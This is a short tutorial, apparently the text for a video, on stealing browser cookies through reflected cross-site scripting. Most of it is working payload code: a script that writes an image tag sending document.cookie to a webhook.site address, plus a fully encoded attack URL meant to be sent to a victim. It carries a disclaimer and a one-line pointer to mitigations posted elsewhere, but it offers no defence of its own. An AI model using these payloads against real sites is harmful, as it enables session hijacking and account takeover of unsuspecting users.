Disclaimer: This video is intended for Cyber Security professionals and Students who are looking to help others stay safe online.
We can leverage the following website so that we do not need our own webserver. https://webhook.site/
With a webhook in hand, we’re ready to craft our payload. Our payload should look like this. We’ll want to make sure we replace the URL with our generated webhook address.
A simple test can first be created with this:
<img src="[URL]/test.jpg" /> http://[URL]/test.js
<script>
document.write('<img src="[URL]?c='+document.cookie+'" />');
</script>
Once the browser renders the JavaScript the <img tag should look like the following and send the cookies to our website:
<img src="[URL]?c=[COOKIE]"/>
Before sending the link to the victim, make sure you encode the + symbols by replacing them with %2b
.
An example payload will look like the following:
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>
Mitigations
Check out my other posts that discuss how you can protect yourself from these type of attacks.